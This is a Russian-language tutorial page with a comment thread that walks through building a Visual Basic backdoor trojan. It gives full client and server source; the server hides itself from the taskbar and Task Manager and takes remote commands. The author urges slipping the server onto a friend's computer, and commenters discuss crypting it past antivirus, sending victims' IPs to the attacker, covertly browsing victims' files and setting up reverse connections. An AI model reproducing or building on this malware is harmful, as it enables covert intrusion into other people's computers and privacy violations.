Программирование
Веб программирование

Троян на vb

 
 

Троян("Понни") - нужен для удаленнго управления вражеским компом, т.е. подкидываешь его другу, и если он в нете будет, то ты можешь что нибуть с его компом сделать. Трояны делятся на много типов, но мы будем делать самый распространенный(BackDoor).
Начнем.
Для начала сделаем клиент:
На форму кинь 5 кнопок(у 1 Caption = "Присоедениться", у 2ой = "Отсоедениться", у 3ей = "Открыть сидюк", у 4ой = "Послать сообщение", у 5ой = "Закрыть сервер", 1 текстовое поле, 1 метку Caption = "IP", ну и не забудь подключить Winsock(родимый!:-))):

Код:

Private Sub Command1_Click()
Winsock1.RemoteHost = Text1.Text ' Устанавливаем IP вписанный в текстовое поле
Winsock1.RemotePort = 1000 ' Устанавливаем порт
Winsock1.Connect ' Соеденяемся
End Sub 

Private Sub Command2_Click()
Winsock1.Close ' Отключаемся
End Sub

Private Sub Command3_Click()
On Error Resume Next ' Если происходит ошибка(нет соединения, а ты нажал на кнопку) то пропускаем следующюю строку
Winsock1.SendData "CD" ' Посылаем серверу команду CD
Bla ' Вызываем функцию Bla
End Sub

Function Bla() ' Эта функция будет обрабатывать ошибки
If Err.Number = 40006 Then MsgBox "Связь с сервером не установлена", 48, "Ты не правильный IP ввел" ' Здесь если происходит ошибка 40006(нет соединения), то выдаем сообщение об этом
End Function

' Дальше объяснять не буду(и так все понятно)
Private Sub Command4_Click()
Dim S As String
S = InputBox("Введи текст", "Смерть ламерам")
On Error Resume Next
Winsock1.SendData S
Bla
End Sub

Private Sub Command5_Click()
On Error Resume Next
Winsock1.SendData "End"
Bla
End Sub

Private Sub Form_Load()
Text1.Text = "127.0.0.1"
End Sub

Ну усе, клиент готов, теперь нужен сервер:
У Формы свойство Visible = False, на нее кинь Winsock1(только не забудь его подключить, ОК?), и таймер. Вот код:

 

' API функции:
' Открываем сидюк 
Private Declare Function mciSendString Lib "winmm.dll" Alias "mciSendStringA" (ByVal lpstrCommand As String, ByVal lpstrReturnString As Any, ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long
Dim Status As Integer

' Скрываем программу от CTRL + ALT + DEL
Private Declare Function RegisterServiceProcess Lib "kernel32" (ByVal ProcessID As Long, ByVal ServiceFlags As Long) As Long
Private Declare Function GetCurrentProcessId Lib "kernel32" () As Long

' Скрываем программу с Панели задач(это напротив Пуска)
Const WS_EX_APPWINDOW = &H40000
Const GWL_STYLE = (-16)
Const GWL_EXSTYLE = (-20)
Const SW_HIDE = 0
Const SW_NORMAL = 1
Private Declare Function GetWindowLong Lib "user32" Alias "GetWindowLongA" (ByVal hwnd As Long, ByVal nIndex As Long) As Long
Private Declare Function SetWindowLong Lib "user32" Alias "SetWindowLongA" (ByVal hwnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Private Declare Function ShowWindow Lib "user32" (ByVal hwnd As Long, ByVal nCmdShow As Long) As Long
Private Declare Function SetWindowPos Lib "user32" (ByVal hwnd As Long, ByVal hWndInsertAfter As Long, ByVal x As Long, ByVal y As Long, ByVal cx As Long, ByVal cy As Long, ByVal wFlags As Long) As Long
Const SWP_SHOWWINDOW = &H40
Const SWP_HIDEWINDOW = &H80
Dim ret&

Private Sub Form_Load()
' Скрываем программу с Панели задач(это напротив Пуска)
ShowWindow Form1.hwnd, SW_HIDE
ret = GetWindowLong(Form1.hwnd, GWL_EXSTYLE)
SetWindowLong Form1.hwnd, GWL_EXSTYLE, ret Xor WS_EX_APPWINDOW
ShowWindow Form1.hwnd, SW_NORMAL

Timer1.Interval = 1000 ' Включаем таймер
' Скрываем программу от CTRL + ALT + DEL
RegisterServiceProcess GetCurrentProcessId, 1
End Sub

Private Sub Timer1_Timer()
Do ' Цикл
DoEvents ' Это чтоб система не повисла
If Winsock1.State <> sckConnected And Winsock1.State <> sckListening Then ' Если не установлена связь, и порт не прослушивается, то
Winsock1.Close ' Закрываем соединение
Winsock1.LocalPort = 1000 ' Устанавливаем порт
Winsock1.Listen ' Начинаем слушать порт
End If
Loop
End Sub

Private Sub Winsock1_ConnectionRequest(ByVal requestID As Long)
Winsock1.Close ' Закрываем соединение(если оно открыто)
Winsock1.Accept requestID ' Принимаем запрос
End Sub

Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long) ' Принимаем команды от клиента:
Dim Data As String
Winsock1.GetData Data ' Записываем текст посланный клиентом в переменную
If Data = "CD" Then mciSendString "Set CDAudio Door Open Wait", 0&, 0, 0 ' Если от клиента пришел текст "CD", то открываем сидюк
' Здесь все анологично
If Data <> "End" And Data <> "CD" Then MsgBox Data, 64, ""
If Data = "End" Then End
End Sub

Private Sub Form_Unload(Cancel As Integer)
RegisterServiceProcess GetCurrentProcessId, 0 ' Показываем программу в списке CTRL + ALT + DEL
End Sub

Ну все, теперь сервер дай другу(только в начале его IP узнай(ил имя компа)), скажи ему чтоб в чат зашел(ну там договорись в определенное время), и управляй его компом.
P.S. Сервер немного не доделан, можно сделать чтоб он в реестре прописался, и иконка была как у рисунка.
Исходник


Есть вопросы? Спроси на нашем форуме!!
макс [18.06.2010 23:52]

очень круто !!!

макс [19.06.2010 12:09]

забыл добавить, не хватает 1 важной функции,
при подключении к интернету троян должен посылать ip жерты на e-mail хакера ! и можно было бы еще подгрузить модуль для управления рабочим столом !!!

Леня [04.09.2010 10:38]

макс ты просто гений , можешь подкинуть отяюы начало модуля , а тоя еще не мастер в эти дела

Вася [04.10.2010 01:19]

у меня почему-то после запуска сервера загрузка процессора достигает 99% и комп виснет

ПЕтр [15.10.2010 07:57]

а у меня антивирус сразу удаляет его

Костя [21.11.2010 00:33]

у меня та же проблема. как можно скрыть его от антивируса? можно-ли как-нибудь зашифровать его?

Славик [18.12.2010 16:40]

А че прикольно! антивирус мой её не обнаруживает чето =)

Славик [18.12.2010 18:33]

Кстати забыл, В этом же учебнике есть раздел IP B VB, Исходя из неё можно сделать неплохую модификацию программы =D

Vasla [27.12.2010 10:56]

У-у-у-у. Чувак!
Спасибочки

Тоха [23.02.2011 09:25]

спасибки ето канешна реальная вещь! Токо от IP ещё узнавать надо...

Vanja [24.03.2011 15:11]

Не подскажите,с Winsock раньше не работал,а как его подключить? :\

Vanja [27.03.2011 01:51]

Сори за тупой вопрос,уже понял))

shell25 [27.05.2011 18:52]

Чтоб Касперский не вякал или Нод придется закриптовать!

_DOS_ [18.06.2011 13:30]

а для vb 2010 этот способ подойдет?

тупой идиот [29.06.2011 17:45]

тут есть страничка prs.narod.ru/programming/vb/arts/trojan.html
как соеденить две стати используя основу от второй?

ObelardO [24.08.2011 11:37]

Писал траян более продвинутый но по тому же принцепу. Управление рабочим столом мышью клавиатуой можно в реальном времени смотреть на монитор жертвы. работы с 10 клиентами единовременно и подключиться можно в любой момент.

алексей [30.10.2011 22:26]

ObelardO
а как ты сделал чтоб монитор жертвы смотреть . я упраление мышью и клавой сделал а монитор не могу :(

алексей [30.10.2011 23:31]

можно удалять,перменовать т.д. папки,файлы т.д. при помощи упраление мыши и клавай . а можно ли это делать по другому? что бы юзар игрался в компе и я не мешая ему смотрел фотки удалял файлы копался в рестре т.д. что бы юзер не заметил это

алексей [30.10.2011 23:32]

можно удалять,перменовать т.д. папки,файлы т.д. при помощи упраление мыши и клавай . а можно ли это делать по другому? что бы юзар игрался в компе и я не мешая ему играться, я смотрел его фотки удалял файлы копался в рестре т.д. что бы юзер не заметил это

Валентина [05.11.2011 22:50]

Очень интересная статья: http://vbbook.ru/visual-basic/virus-na-visual-basic/

Советую почитать. Тоже про троянчики и вирусы на VB

алексей [10.11.2011 14:58]

спс

Эдик [19.11.2011 19:12]

почему выдает оошибку в строке "Timer1.Interval = 1000 ' Включаем таймер
' Скрываем программу от CTRL + ALT + DEL
RegisterServiceProcess GetCurrentProcessId, 1
End Sub"

алексей [19.11.2011 19:22]

у меня тоже там выдаёт ошибку
я просто это стёр и всё

эдик [22.11.2011 11:19]

спасибо за ответ алексей

алексей [22.11.2011 14:14]

да не за что

алексей [22.11.2011 14:16]

я уже делаю троянчик с управлением чужим компом , а вот просмотр экрана я только догадываюсь как можно сделать.

&#0; [26.11.2011 16:16]

а как подключить Winsock? я нуб

алексей [26.11.2011 16:58]

&#0, молодец что сам признался.
Короче на русском жмёшь на панель (с инструментами/компонентоми) правой кнопкой мышь выбираешь компоненты/components я уже не помню , и ищешь "Microsoft Winsock Control 6.0"
если нету то жмёшь обзор и ищешь "mswsock" полный путь "C:\Windows\System32\mswsock.dll" если нету то надо тебе скачать winsock и зарегистрировать компонент

ФРАГЕр [04.01.2012 18:28]

блин соединение не устанавливается с другим компом!!!
может порт не тот??

алексей [04.01.2012 23:40]

у меня таже фигня

ФРАГер [07.01.2012 20:48]

я понял в чем фишка,а фишка та в модеме если он есть у жертвы то никак!ну или усовершенствовать вирус?

алексей [07.01.2012 21:02]

а модем тут причём?? 0_о

алексей [08.01.2012 16:58]

работает!!!!

фрагер [08.01.2012 18:30]

на компе без модема оно пашет

Нуб [08.02.2012 18:57]

я не понел 2 формы надо?

Нуб [08.02.2012 19:01]

я не понел 2 формы надо?

нуб [08.02.2012 20:46]

спс разобрался

Максим [15.02.2012 20:12]

фаервол эту фигню сразу засечет у меня Pc tools орет

kreativ4eg [03.07.2012 10:33]

так кто нибудь смог сделать "Управление рабочим столом мышью, клавиатуой можно в реальном времени..."????

-Гепард97- [30.09.2012 18:23]

Первое. Параноидальными антивирями все входящие банятся, и вы обломаетесь. Меняем местами клиентскую часть и серверную (т.е. боеголовка будет звонить на твой комп).
Второе. Мало у кого статический айпишник. Топаем на no-ip.com, регаем бесплатное доменное имя (пусть 3 лвл пофиг) и с того же сайта качаем программку которая постоянно будет отслеживать айпи и отсылать его на их сервер. Соответственно меняем айпишник на имя сайта и PROFIT! (Только не забудьте разрешить входящие на ваш сервак LOL)
Третье. У кого хватит моска допилить до кошерности?))

ozzee20 [11.06.2013 21:29]

А можно при помощи DirListBox лазить по файлам?



Оставлять комментарии можно только зарегистрированным




Предупреждение: Вся информация представлена исключительно в образовательных целях.
Ни авторы, ни администрация не несут ответственности в случае ее использования в противозаконных целях.